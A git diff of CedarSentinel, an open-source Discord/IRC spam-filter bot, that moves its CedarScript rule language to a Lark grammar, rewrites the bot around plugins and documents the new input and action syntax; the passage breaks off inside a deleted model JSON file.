-languages. The following are some simple comparisons: +#### Conditions - <0.5 confidence> - [20 length] - {5 reputation} - /5 reputation\ +If statements have the following syntax: -The syntax is an opening comparator, a space-separated list of values, and a -closing comparator. The following comparators are defined: - -| Comparators | Python equivalent | -|-------------|-------------------| -| `<...>` | `<` | -| `[...]` | `<=` | -| `{...}` | `==` | -| `/...\` | `!=` | - -Items in a comparison are compared in order, left to right. For `{...}` and -`/...\`, order is not significant, but it is for `<...>` and `[...]`. The -example comparisons listed above translate to the following in Python: - - 0.5 < confidence - 20 <= length - 5 == reputation - 5 != reputation - -Comparisons are not limited to two values, although having more than three is -rarely, if ever, useful. `<0.4 confidence 0.6>` translates to `0.4 < -confidence < 0.6`. - -##### Conjunctions, grouping, and order of operations. +``` +if [condition] { + ... +} else { + ... +} +``` -CedarSentinel's conjunctions (`and`, `or`) and grouping (with parenthesis) -work the same as Python's. Any difference is a bug that should be reported. +The `else` block is optional. The `[condition]` is written as a comparison +between values. The supported operators are `<`, `<=`, `==`, `!=`, `>=`, and +`>`; they work as would be expected. Multiple comparisons can be combined using +`and` and `or`; parenthesis can be used for grouping, but are not syntactically +required. #### Inputs -Inputs are values provided to the script by CedarSentinel. The following are -available: +Inputs are values provided to the script by CedarSentinel plugins. Their names +consist of a dollar sign (`$`), followed by the name of the plugin (without the +`cs_` prefix), a period (`.`), and the input name. These inputs are provided by +the default plugins: -| Name | Meaning | -|--------------|-------------------------------------| -| `confidence` | Confidence that the message is spam | -| `reputation` | The message's author's reputation | -| `length` | The length of the message | +| Name | Meaning | +|----------------------|-------------------------------------| +| `$gptc.confidence` | Confidence that the message is spam | +| `$reputation.value` | The message's author's reputation | +| `$length.length` | The length of the message | #### Actions -Actions are how the script tells CedarSentinel what to do in respone to -the message. The following are available: - -| Name | Meaning | -|----------------------|-------------------------------------------------------| -| `flag` | Flag the message as spam | -| `moderate` | IRC: same as `flag`; Discord: flag and delete message | -| `log` | Log the message for manual classification | -| `increasereputation` | Increase the author's reputation | -| `decreasereputation` | Decrease the author's reputation | +Actions are how the script tells CedarSentinel what to do in respone to the +message. Their names have the same format as input names, except they begin +with an at sign (`@`) instead of a dollar sign. Also, CedarSentinel itself, +without relying on plugins, provides some actions; their names do not contain +periods. + +| Name | Meaning | +|------------------------|----------------------------------------------------------------| +| `@flag` | Flag the message as spam | +| `@delete` | IRC: same as `flag`; Discord: flag and delete message | +| `@gptc.log_good` | Add the message to the model as known good | +| `@gptc.log_prob_good` | Log the message for manual review as uncertain but likely good | +| `@gptc.log_unknown` | Log the message for manual review as unknown qualiy | +| `@gptc.log_prob_spam` | Log the message for manual review as uncertain but likely spam | +| `@gptc.log_spam` | Add the message to the model as known spam | +| `@reputation.increase` | Increase the author's reputation | +| `@reputation.decrease` | Decrease the author's reputation | + +Please note that `@gptc.log_good` and `@gptc.log_spam` are best avoided. +CedarSentinel can never be entirely sure that a message is good or bad; these +actions add messages directly into the model with no human review, so there is +a significant possibility of messages being inaccurately categorized and never +detected. This, of course, will make CedarSentinel less effective. This would +most likely occur accidentally, but a malicious user could potentially +deliberately insert harmful content into the training database as well. For +these reasons, it is most likely best to instead use `@gptc.log_prob_good` and +`@gptc.log_prob_spam` instead, and review the logged messages manually using +the training tool. ### Contributors @@ -188,25 +149,11 @@ Samuel Sloniker (kj7rrv). Feel free to fork it and push your improvements and/or bugfixes upstream! ### License -MIT License -``` -Copyright 2021 Matthew Petry (fireTwoOneNine) and Samuel Sloniker (kj7rrv) -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. -``` +Copyright 2021-2024 Matthew Petry (fireTwoOneNine) and Samuel Sloniker (kj7rrv) + +Code from commit 9dbe028c8f8fb765e963cd5cd59b8a2b04a30178 and earlier, +including all code by Matthew Petry, was released under the MIT license, and +may still be used under its terms. Code from after that commit is released +under the GNU General Public License, version 3 or later. See `LICENSE` for +more details. diff --git a/bot.py b/bot.py index cd6c640..4f48cd1 100644 --- a/bot.py +++ b/bot.py @@ -11,296 +11,99 @@ # A Discord Bot for using trained models to detect spam # Built for the Pine64 Chat Network -# Copyright 2021-2022 Matthew Petry (fireTwoOneNine), Samuel Sloniker (kj7rrv) -# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), -# to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, -# and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, -# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE -# OR OTHER DEALINGS IN THE SOFTWARE. - from importlib import import_module -from re import M -from time import sleep -from urllib import response -import discord -import irc.bot -import gptc import yaml from yaml.loader import SafeLoader -import json -import datetime -import http.client import pprint import cedarscript +from cedarscript.command_types import CommandList, Command, Action, Input -optionalModules = ["cv2", "pytesseract", "numpy", "requests"] -try: - for module in optionalModules: - import_module(module) - ocrAvailable = True - # following line is redundant, but is provided to suppress errors from language helpers like Pylance - import cv2 - import pytesseract - import numpy - import requests - - print("All optional modules loaded. OCR features are available (if enabled in config)") -except ImportError as error: - print("Unable to import " + module + ". OCR features are unavailable.") - ocrAvailable = False - - -version = "0.6.2" +version = "0.7.0" configFile = "config.yaml" -knownUsers = {} - - -def change_reputation(username, change): - try: - knownUsers[username] = knownUsers[username] + change - except KeyError: - knownUsers[username] = change - - if config["persistKnownUsers"]: - with open(config["persistFile"], "w") as f: - json.dump(knownUsers, f) - - -def get_reputation(username): - try: - return knownUsers[username] - except KeyError: - knownUsers[username] = 0 - if config["persistKnownUsers"]: - with open(config["persistFile"], "w") as f: - json.dump(knownUsers, f) - return 0 - - # Extract username of message sender, and return status based on classification and/or known user bypass -def handle_message(author, content, attachments=[]): +def handle_message(author, content, target, flag_text=None): if author == config["bridgeBot"]: author = content.split(">", 1)[0] author = author.split("<", 1)[1].replace("@", "").strip() content = content.split(">", 1)[1] - # TODO: OCR functionality for image links on IRC - if (config["ocrEnable"] == True) and (ocrAvailable == True): - for item in attachments: - # very naive filetype checker - # TODO: find a better way to check image type and validity. - filetypes = [".jpg", ".jpeg", ".png"] - for ftype in filetypes: - if ftype in item.url: - targetImage = requests.get(item.url) - targetArray = numpy.frombuffer(targetImage.content, numpy.uint8) - targetImageCV = cv2.imdecode(targetArray, cv2.IMREAD_UNCHANGED) - targetText = pytesseract.image_to_string(targetImageCV) - if config["debugMode"]: - print("OCR result: " + targetText.strip()) - content = content + targetText - break - - confidences = { - "good": 0, - "spam": 0, - } # set defaults for good and spam to prevent KeyErrors in parsing - confidences.update(classifier.confidence(content)) - content = content.strip() author = author.strip() - confidence = confidences["spam"] - length = len(content) - reputation = get_reputation(author) - - actions = interpreter.interpret(confidence, length, reputation) - - if "log" in actions: - logMessage(content, confidence) - - if "increasereputation" in actions: - change_reputation(author, 1) - elif "decreasereputation" in actions: - change_reputation(author, -1) - - flag = "flag" in actions or "moderate" in actions - moderate = "moderate" in actions - - return flag, moderate, confidence, author, content + inputs = { + input.name: input.function(message=content, username=author) + for input in commands.inputs + } + actions = script(inputs) + flag = "flag" in actions or "delete" in actions + moderate = "delete" in actions -# Prepare and send notification about detected spam -async def sendNotifMessage(message, confidence=0.0, customMessage=""): - notifChannel = None - notifPing = "" - - for channel in message.guild.text_channels: - if channel.name == config["notificationChannel"]: - notifChannel = channel - if notifChannel is None: - notifChannel = message.channel - print("Notification channel not found! Sending in same channel as potential spam.") - - for role in message.guild.roles: - if role.name == config["spamNotifyPing"]: - notifPing = role.mention - - if customMessage == "": - await notifChannel.send(f'{notifPing} {"**"} {config["spamNotifyMessage"]} {"**"} {message.jump_url}') - if config["debugMode"]: - await notifChannel.send(f"DEBUG: Confidence value on the above message is: {confidence}") - else: - await notifChannel.send(customMessage) - - -# log message to file for later analysis -def logMessage(message, confidence): - with open(config["spamFile"], "a") as f: - logTime = str(datetime.datetime.today()) - f.write(",\n") # append to previous JSON dump, and make this prettier for human eyes - logEntry = {"time": logTime, "message": message, "confidence": confidence} - json.dump(logEntry, f) - - -async def messageDeleter(message): - if config["autoDeleteAPI"] == "customMB": - bridge = http.client.HTTPConnection(config["bridgeURL"]) - bridge.request("DELETE", "/api/message", headers={"Content-Type": "application/json"}, body='{"id": "%s", "channel": "%s", "protocol": "discord", "account": "discord.mydiscord"}' % (message.id, message.channel.name)) - response = bridge.getresponse() - responseText = response.read() - await sendNotifMessage(message, customMessage="**Automatic Deletion Result:** %s" % (responseText.decode("utf-8").strip())) - await sendNotifMessage(message, customMessage="**Message was:** `%s`" % (message.content)) - alertMsg = await message.channel.send(config["publicDeleteNotice"]) - sleep(10) - bridge.request("DELETE", "/api/message", headers={"Content-Type": "application/json"}, body='{"id": "%s", "channel": "%s", "protocol": "discord", "account": "discord.mydiscord"}' % (alertMsg.id, alertMsg.channel.name)) - if config["autoDeleteAPI"] == "discord": - try: - await message.delete() - except discord.Forbidden: - await sendNotifMessage(message, customMessage="**Automatic Deletion Result:** No permission") - return - except discord.NotFound: - await sendNotifMessage(message, customMessage="**Automatic Deletion Result:** Message does not exist") - return - except discord.HTTPException: - await sendNotifMessage(message, customMessage="**Automatic Deletion Result:** Failed") - return - await sendNotifMessage(message, customMessage="**Automatic Deletion Result:** OK") - alertMsg = await message.channel.send(config["publicDeleteNotice"]) - sleep(10) - await alertMsg.delete() - - -class BotInstance(discord.Client): - async def on_ready(self): - print(f"Logged on as {self.user}!") - - async def on_message(self, message): - if not (message.author == bot.user): - author = message.author.name + "#" + message.author.discriminator - content = message.content - attachments = message.attachments - flag, moderate, confidence, author, content = handle_message(author, content, attachments) - print(f"Message from {author} -> {message.channel}: {content}") - if config["debugMode"]: - print(confidence) - print(f"Flagging: {flag}; Moderating: {moderate}") - - if flag: - await sendNotifMessage(message, confidence) + for action in actions: + if "." in action: + commands.to_dict()[action].function( + message=content, username=author, inputs=inputs + ) - if moderate: - if not (config["autoDeleteAPI"] == "none"): - await messageDeleter(message) + if flag_text is None: + flag_text = content + chat_message = f'{config["spamNotifyMessage"]} ( {author} -> {target} ) {flag_text}\nInputs: `{str(inputs)}`\nActions: `{str(actions)}`' + print() + print( + f"{author} -> {target}: {content}\nInputs: {str(inputs)}\nActions: {str(actions)}" + ) + return flag, moderate, author, content, inputs, actions, chat_message -class CedarSentinelIRC(irc.bot.SingleServerIRCBot): - def on_nicknameinuse(self, c, e): - c.nick(c.get_nickname() + "_") - def on_welcome(self, connection, event): - print("Connected!") +def run(): + global full_config, config, commands, script + print("Cedar Sentinel version " + version + " starting up.") + print() - for target in config["channels"].split(" "): - connection.join(target) - if config["notificationChannel"].startswith("#"): - connection.join(config["notificationChannel"]) + # load files + with open(configFile) as f: + full_config = yaml.load(f, Loader=SafeLoader) + config = full_config["platformConfig"][full_config["platform"]] + print("Configuration loaded!") + pprint.pprint(full_config) + print() - def on_join(self, connection, event): - print(f"Joined {event.target}!") + def do_nothing(*_, **__): + pass - def on_pubmsg(self, connection, event): - author = event.source.split("!")[0].strip() - content = event.arguments[0] - flag, moderate, confidence, author, content = handle_message(author, content) + commands = CommandList( + [Action("flag", do_nothing), Action("delete", do_nothing)] + ) + for name in full_config["plugins"]: + print(f"Loading plugin `{name}`...") + plugin = import_module(f"plugins.cs_{name}") + plugin.config = full_config["pluginConfig"].get(name, {}) + plugin.initialize() + plugin_contents = [getattr(plugin, i) for i in dir(plugin)] + plugin_commands = CommandList( + i for i in plugin_contents if isinstance(i, Command) + ) + commands += plugin_commands.prefix(name) + print(f"Loaded plugin `{name}`!") print() - print(f"Message from {author} -> {event.target}: {content}") - if config["debugMode"]: - print(confidence) - print(f"Flagging: {flag}") - if flag: - notification_channel = config["notificationChannel"] - if notification_channel == "*": - notification_channel = event.target - - connection.privmsg( - notification_channel, - f'{config["spamNotifyPing"]}: {config["spamNotifyMessage"]} ({author} -> {event.target}) {content}', - ) - if config["debugMode"]: - connection.privmsg( - notification_channel, - f"DEBUG: Confidence value on the above message is: {confidence}", - ) - - -print("Cedar Sentinel version " + version + " starting up.") -print() -# load files -with open(configFile) as f: - config = yaml.load(f, Loader=SafeLoader) -print("Configuration loaded!") -pprint.pprint(config) -print() + print("Inputs:", [i.name for i in commands.inputs]) + print("Actions:", [i.name for i in commands.actions]) + print() -if config["persistKnownUsers"]: - try: - with open(config["persistFile"]) as f: - knownUsers = json.load(f) - print("Known users file loaded!") - except: - print("No known users file found. Starting fresh.") -print() + with open("script.txt") as f: + script = cedarscript.load(f.read()) + print("CedarScript interpreter loaded!") + print() -with open(config["spamModel"]) as f: - spamModel = json.load(f) -classifier = gptc.Classifier(spamModel) -print("GPTC model loaded!") -print() + platform = import_module(f"platforms.cs_platform_{full_config['platform']}") + platform.config = config["private"] + platform.handle_message = handle_message + print(f"Loaded platform `{full_config['platform']}`!") + print() + platform.run() -with open("script.txt") as f: - script = f.read() -interpreter = cedarscript.Interpreter(script) -print("CedarScript interpreter loaded!") -print() -# Startup - -if config["platform"] == "discord": - bot = BotInstance() - bot.run(config["discordToken"]) -elif config["platform"] == "irc": - bot = CedarSentinelIRC( - [irc.bot.ServerSpec(config["ircServer"], int(config["ircPort"]))], - config["ircNick"], - config["ircNick"], - ) - bot.start() +run() diff --git a/cedarscript/__init__.py b/cedarscript/__init__.py index 1cf2d2a..d517645 100644 --- a/cedarscript/__init__.py +++ b/cedarscript/__init__.py @@ -1,2 +1,10 @@ -from .interpreter import Interpreter -from .definitions import CedarScriptSyntaxError +from lark import Lark, Transformer +from pathlib import Path +from cedarscript.transformer import CedarScriptTransformer + +with open(Path(__file__).parent / "grammar.lark") as f: + parser = Lark(f.read(), start="block") + + +def load(script): + return CedarScriptTransformer().transform(parser.parse(script)) diff --git a/cedarscript/code_classes.py b/cedarscript/code_classes.py new file mode 100644 index 0000000..2e91686 --- /dev/null +++ b/cedarscript/code_classes.py @@ -0,0 +1,139 @@ +import dataclasses +from types import FunctionType +from typing import Union + + +@dataclasses.dataclass +class CodePiece: + pass + + +@dataclasses.dataclass +class Boolean(CodePiece): + pass + + +@dataclasses.dataclass +class Block(CodePiece): + items: list + + def __call__(self, inputs): + actions = set() + for item in self.items: + actions = actions.union(item(inputs)) + return actions + + +@dataclasses.dataclass +class Instruction(CodePiece): + pass + + +@dataclasses.dataclass +class Action(Instruction): + name: str + + def __call__(self, inputs): + return { + self.name, + } + + +@dataclasses.dataclass +class IfStatement(Instruction): + condition: Boolean + true_block: Block + false_block: Instruction + + def __call__(self, inputs): + if self.condition(inputs): + return self.true_block(inputs) + else: + return self.false_block(inputs) + + +@dataclasses.dataclass +class Number(CodePiece): + pass + + +@dataclasses.dataclass +class Constant(Number): + value: int + + def __call__(self, inputs): + return self.value + + +@dataclasses.dataclass +class Input(Number): + name: str + + def __call__(self, inputs): + return inputs[self.name] + + +@dataclasses.dataclass +class Operator(CodePiece): + name: str + function: dataclasses.InitVar[FunctionType] + + def __post_init__(self, function): + self.function = function + + def __call__(self, a, b): + return self.function(a, b) + + +@dataclasses.dataclass +class ComparisonOperator(Operator): + pass + + +comparison_operators = { + "<": ComparisonOperator("<", lambda x, y: x < y), + "<=": ComparisonOperator("<=", lambda x, y: x <= y), + "==": ComparisonOperator("==", lambda x, y: x == y), + "!=": ComparisonOperator("!=", lambda x, y: x != y), + ">=": ComparisonOperator(">=", lambda x, y: x >= y), + ">": ComparisonOperator(">", lambda x, y: x > y), +} + + +@dataclasses.dataclass +class Comparison(Boolean): + arg_a: Number + operator: ComparisonOperator + arg_b: Number + + def __call__(self, inputs): + return self.operator(self.arg_a(inputs), self.arg_b(inputs)) + + +@dataclasses.dataclass +class CombinationOperator(Operator): + pass + + +combination_operators = { + "and": CombinationOperator("and", lambda x, y: x and y), + "or": CombinationOperator("and", lambda x, y: x or y), +} + + +@dataclasses.dataclass +class Combination(Boolean): + arg_a: Number + operator: CombinationOperator + arg_b: Number + + def __call__(self, inputs): + return self.operator(self.arg_a(inputs), self.arg_b(inputs)) + + +@dataclasses.dataclass +class Inversion(Boolean): + value: Boolean + + def __call__(self, inputs): + return not self.value(inputs) diff --git a/cedarscript/command_types.py b/cedarscript/command_types.py new file mode 100644 index 0000000..5b2bbc8 --- /dev/null +++ b/cedarscript/command_types.py @@ -0,0 +1,42 @@ +import dataclasses +import types + + +@dataclasses.dataclass +class Command: + name: str + function: types.FunctionType + + def prefix(self, namespace): + return type(self)(f"{namespace}.{self.name}", self.function) + + +class Input(Command): + pass + + +class Action(Command): + pass + + +class CommandList(list): + def to_dict(self): + return {command.name: command for command in self} + + def _only_type(self, item_type): + return CommandList(item for item in self if isinstance(item, item_type)) + + @property + def inputs(self): + return self._only_type(Input) + + @property + def actions(self): + return self._only_type(Action) + + def prefix(self, namespace): + return CommandList(command.prefix(namespace) for command in self) + + @property + def names(self): + return [item.name for item in self] diff --git a/cedarscript/decorators.py b/cedarscript/decorators.py new file mode 100644 index 0000000..7507350 --- /dev/null +++ b/cedarscript/decorators.py @@ -0,0 +1,30 @@ +from cedarscript.command_types import Input, Action +import dataclasses +import inspect +import types + + +@dataclasses.dataclass +class TolerantFunction: + function: types.FunctionType + + def __post_init__(self): + self.accepted = inspect.signature(self.function).parameters + + def __call__(self, **kwargs): + new_kwargs = { + key: value for key, value in kwargs.items() if key in self.accepted + } + return self.function(**new_kwargs) + + +def init(function): + return TolerantFunction(function) + + +def input(function): + return Input(function.__name__, TolerantFunction(function)) + + +def action(function): + return Action(function.__name__, TolerantFunction(function)) diff --git a/cedarscript/definitions.py b/cedarscript/definitions.py deleted file mode 100644 index 9c75436..0000000 --- a/cedarscript/definitions.py +++ /dev/null @@ -1,82 +0,0 @@ -keywords = ["if", "else", "end", "and", "or"] -input_list = ["confidence", "reputation", "length"] -action_list = [ - "flag", - "moderate", - "log", - "loggood", - "logspam", - "logprobablygood", - "logprobablyspam", - "increasereputation", - "decreasereputation", -] - - -class CodePiece: - pass - - -class If(CodePiece): - def __init__(self, condition, if_true, if_false): - self.condition = condition - self.if_true = if_true - self.if_false = if_false - - def __repr__(self): - return f"If({self.condition}, {self.if_true}, {self.if_false})" - - -class Identifier(CodePiece): - _type = "Identifier" - - def __init__(self, name): - self.name = name - - def __repr__(self): - return f"{self._type}('{self.name}')" - - -class Input(Identifier): - _type = "Input" - - -inputs = {input_: Input(input_) for input_ in input_list} - - -class Action(Identifier): - _type = "Action" - - -actions = {action: Action(action) for action in action_list} - - -class Conjunction(Identifier): - _type = "Conjunction" - - -conjunctions = { - "and": Conjunction("and"), - "or": Conjunction("or"), -} - -comparators = { - "<": "<", - "[": "<=", - "{": "==", - "/": "!=", -} - - -class Comparison(CodePiece): - def __init__(self, comparator, values): - self.values = values - self.comparator = comparators[comparator] - - def __repr__(self): - combined = f" {self.comparator} ".join([repr(value) for value in self.values]) - return f"Comparison({combined})" - - -class CedarScriptSyntaxError(BaseException): - pass diff --git a/cedarscript/grammar.lark b/cedarscript/grammar.lark new file mode 100644 index 0000000..c07504d --- /dev/null +++ b/cedarscript/grammar.lark @@ -0,0 +1,22 @@ +block: (action | if_statement)+ + +if_statement: "if" _condition _wrapped_block _else? +_wrapped_block: "{" block "}" +_else: "else" (_wrapped_block | if_statement) + +_condition: inversion | comparison | combination | ( "(" _condition ")" ) +inversion: "not" _condition +comparison: _value COMPARISON_OPERATOR _value +combination: _condition COMBINATION_OPERATOR _condition +COMPARISON_OPERATOR: "<" | "<=" | "==" | "!=" | ">=" | ">" +COMBINATION_OPERATOR: "and" | "or" + +IDENTIFIER: /[a-z_]+/ ("." /[a-z_]+/)? +action: "@" IDENTIFIER +input: "$" IDENTIFIER + +_value: input | constant +constant: NUMBER +NUMBER: ("0".."9")+ ( "." ("0".."9")+ )? + +%ignore (" " | "_" | "\n")+ diff --git a/cedarscript/interpreter.py b/cedarscript/interpreter.py deleted file mode 100644 index 6097595..0000000 --- a/cedarscript/interpreter.py +++ /dev/null @@ -1,70 +0,0 @@ -import cedarscript.definitions as definitions -import cedarscript.parser as parser - - -class Interpreter: - def __init__(self, code): - self.code = parser.parse(code) - - def interpret(self, confidence, length, reputation): - inputs = { - "confidence": confidence, - "length": length, - "reputation": reputation, - } - return self.interpret_block(self.code, inputs) - - def interpret_block(self, code, inputs): - actions = set() - for statement in code: - if isinstance(statement, definitions.Action): - actions.add(statement.name) - elif isinstance(statement, definitions.If): - if self.interpret_expression(statement.condition, inputs): - block_actions = self.interpret_block(statement.if_true, inputs) - else: - block_actions = self.interpret_block(statement.if_false, inputs) - - actions = set( - ( - *actions, - *block_actions, - ) - ) - return actions - - def evaluate(self, token, inputs): - if isinstance(token, float): - return token - elif isinstance(token, definitions.Input): - return inputs[token.name] - - def interpret_expression(self, expression, inputs): - if isinstance(expression, definitions.Comparison): - values = [self.evaluate(token, inputs) for token in expression.values] - comparator = { - "<": (lambda x, y: x < y), - "<=": (lambda x, y: x <= y), - "==": (lambda x, y: x == y), - "!=": (lambda x, y: x != y), - }[expression.comparator] - - tests = [] - - while len(values) >= 2: - tests.append(comparator(*values[0:2])) - values.pop(0) - - return all(tests) - elif isinstance(expression, list): - expressions = [self.interpret_expression(e, inputs) for e in expression[::2]] - conjunctions = [{"and": (lambda x, y: x and y), "or": (lambda x, y: x or y)}[e.name] for e in expression[1::2]] - - state = expressions.pop(0) - - while conjunctions: - state = conjunctions.pop(0)(state, expressions.pop(0)) - - return state - elif isinstance(expression, definitions.Input): - return inputs[expression.name] diff --git a/cedarscript/lexer.py b/cedarscript/lexer.py deleted file mode 100644 index aa711d0..0000000 --- a/cedarscript/lexer.py +++ /dev/null @@ -1,73 +0,0 @@ -import cedarscript.definitions as definitions - - -def split(code): - code = code.lower() - - tokens = [""] - indices = [[]] - - for index, char in enumerate(code.replace(" ", "||||")): - if char in "abcdefghijklmnopqrstuvwxyz": - if not tokens[-1].isalpha(): - tokens.append("") - indices.append([]) - tokens[-1] += char - indices[-1].append(index) - elif char in "0123456789.": - if not tokens[-1].replace(".", "0").isnumeric(): - tokens.append("") - indices.append([]) - tokens[-1] += char - indices[-1].append(index) - elif char in "<>[]{}()/\:\n": - tokens.append(char) - indices.append([index]) - tokens.append("") - indices.append([]) - elif char == "|": - if tokens[-1].replace("|", "") == "" and tokens[-2] == "\n": - tokens[-1] += "|" - indices[-1].append(index) - elif char == " ": - tokens.append("") - indices.append([]) - elif not (char == "_" and tokens[-1].isalpha()): - raise definitions.CedarScriptSyntaxError(f"invalid character: `{char}`") - return tokens, indices - - -def compress(tokens, indices): - tokens = [token for token in tokens if token] - indices = [[min(index), max(index)] for index in indices if index] - return tokens, indices - - -def combine(tokens, indices): - return [{"token": token, "location": location} for token, location in zip(tokens, indices)] - - -def lineify(tokens): - lines = [[]] - for token in tokens: - lines[-1].append(token) - if token["token"] == "\n": - lines.append([]) - - start = 0 - for line in lines: - if not line: - continue - - for token in line: - token["location"][0] -= start - token["location"][1] -= start - - start = line[-1]["location"][0] + 1 - del line[-1] - - return lines - - -def lex(code): - return lineify(combine(*compress(*split(code)))) diff --git a/cedarscript/parser.py b/cedarscript/parser.py deleted file mode 100644 index 233dd67..0000000 --- a/cedarscript/parser.py +++ /dev/null @@ -1,147 +0,0 @@ -import cedarscript.lexer as lexer -import cedarscript.definitions as definitions - - -def tag(tokens): - for line in tokens: - for token in line: - if token["token"] in definitions.keywords: - token["tag"] = "keyword" - elif token["token"] in definitions.inputs: - token["tag"] = "input" - elif token["token"] in definitions.actions: - token["tag"] = "action" - elif token["token"].replace(".", "0").isnumeric(): - token["tag"] = "number" - token["token"] = float(token["token"]) - elif token["token"] in "<[{/": - token["tag"] = "open_compare" - elif token["token"] in ">]}\\": - token["tag"] = "close_compare" - elif token["token"] == "(": - token["tag"] = "open_paren" - elif token["token"] == ")": - token["tag"] = "close_paren" - elif token["token"].startswith("||||") and len(token["token"]) % 4 == 0: - token["token"] = len(token["token"]) // 4 - token["tag"] = "indent" - else: - raise definitions.CedarScriptSyntaxError(f'unrecognized token: {token["token"]}') - - return tokens - - -def deindent(lines): - new_lines = {} - for number, line in enumerate(lines): - if not line: - pass - elif line[0]["tag"] == "indent": - new_lines[number] = { - "indent": line[0]["token"], - "tokens": line[1:], - "number": number, - } - else: - new_lines[number] = {"indent": 0, "tokens": line, "number": number} - return new_lines - - -def blocks(lines): - lines = list(lines.values()) - stack = [[]] - - for line in lines: - if line["tokens"][0]["token"] == "if": - line["if_true"] = [] - line["if_false"] = [] - stack[-1].append(line) - stack.append(line["if_true"]) - elif line["tokens"][0]["token"] == "end": - stack.pop() - if len(stack) == 0: - raise definitions.CedarScriptSyntaxError(f"`end` outside an `if`/`else` statement") - elif line["tokens"][0]["token"] == "else": - stack.pop() - if len(stack) == 0: - raise definitions.CedarScriptSyntaxError(f"`else` outside an `if` statement") - stack.append(stack[-1][-1]["if_false"]) - else: - stack[-1].append(line) - - return stack[-1] - - -def convert_comparisons(tokens): - combined = [] - for token in tokens: - if token["tag"] == "open_compare": - if "working" in locals(): - raise definitions.CedarScriptSyntaxError("comparisons cannot be nested") - working = {"type": "comparison", "comparator": token["token"], "values": []} - elif token["tag"] == "number": - try: - working["values"].append(token["token"]) - except (NameError, UnboundLocalError): - raise definitions.CedarScriptSyntaxError("number outside comparison") - elif token["tag"] == "input": - try: - working["values"].append(definitions.inputs[token["token"]]) - except (NameError, UnboundLocalError): - raise definitions.CedarScriptSyntaxError("input outside comparison") - elif token["tag"] == "close_compare": - try: - combined.append(definitions.Comparison(working["comparator"], working["values"])) - except (NameError, UnboundLocalError): - raise definitions.CedarScriptSyntaxError(f'closing comparator `{token["token"]}` without matching opening comparator') - del working - elif token["token"] in ["and", "or"]: - combined.append(definitions.conjunctions[token["token"]]) - elif token["tag"] in ["open_paren", "close_paren"]: - combined.append(token["tag"]) - else: - raise definitions.CedarScriptSyntaxError(f'invalid token in boolean expression: {token["token"]}') - - return combined - - -def assemble_expression(expression): - out = [] - stack = [out] - for token in expression: - if isinstance(token, str): - if token == "open_paren": - stack[-1].append([]) - stack.append(stack[-1][-1]) - elif token == "close_paren": - stack.pop() - if len(stack) == 0: - raise definitions.CedarScriptSyntaxError(f"`)` without matching `(`") - else: - stack[-1].append(token) - if len(stack) != 1: - raise definitions.CedarScriptSyntaxError(f"`(` without matching `)`") - return out - - -def gen_ast(lines): - out = [] - for line in lines: - command = line["tokens"][0]["token"] - if command == "if": - out.append( - definitions.If( - assemble_expression(convert_comparisons(line["tokens"][1:])), - gen_ast(line["if_true"]), - gen_ast(line["if_false"]), - ) - ) - elif line["tokens"][0]["tag"] == "input": - out.append(definitions.inputs[command]) - elif line["tokens"][0]["tag"] == "action": - out.append(definitions.actions[command]) - return out - - -def parse(code): - return gen_ast(blocks(deindent(tag(lexer.lex(code))))) diff --git a/cedarscript/transformer.py b/cedarscript/transformer.py new file mode 100644 index 0000000..a5b9d98 --- /dev/null +++ b/cedarscript/transformer.py @@ -0,0 +1,56 @@ +import lark +import cedarscript.code_classes as code_classes + + +def passthrough(self, children): + return children[0] + + +class CedarScriptTransformer(lark.Transformer): + def COMPARISON_OPERATOR(self, children): + return code_classes.comparison_operators[str(children)] + + def COMBINATION_OPERATOR(self, children): + return code_classes.combination_operators[str(children)] + + def NUMBER(self, children): + return float(children) + + def IDENTIFIER(self, children): + return str(children) + + def block(self, children): + return code_classes.Block(children) + + def action(self, children): + return code_classes.Action(children[0]) + + def if_statement(self, children): + condition = children[0] + true_block = children[1] + try: + false_block = children[2] + except IndexError: + false_block = code_classes.Block([]) + return code_classes.IfStatement(condition, true_block, false_block) + + def value(self, children): + return children[0] + + def constant(self, children): + return code_classes.Constant(children[0]) + + def input(self, children): + return code_classes.Input(children[0]) + + def condition(self, children): + return children[0] + + def comparison(self, children): + return code_classes.Comparison(children[0], children[1], children[2]) + + def combination(self, children): + return code_classes.Combination(children[0], children[1], children[2]) + + def inversion(self, children): + return code_classes.Inversion(children[0]) diff --git a/compiled_model.json b/compiled_model.json deleted file mode 100644 index a3689e2..0000000 --- a/compiled_model.json +++ /dev/null @@ -1 +0,0 @@ -{"is": [41952, 23583], "there": [47422, 18113], "actually": [58374, 7161], "a": [39590, 25945], "plan": [65535, 0], "for": [34582, 30953], "pine": [65535, 0], "car": [30700, 34835], "dash": [65535, 0], "cam": [65535, 0], "recording": [65535, 0], "system": [35149, 30386], "modular": [65535, 0], "extensible": [65535, 0], "i": 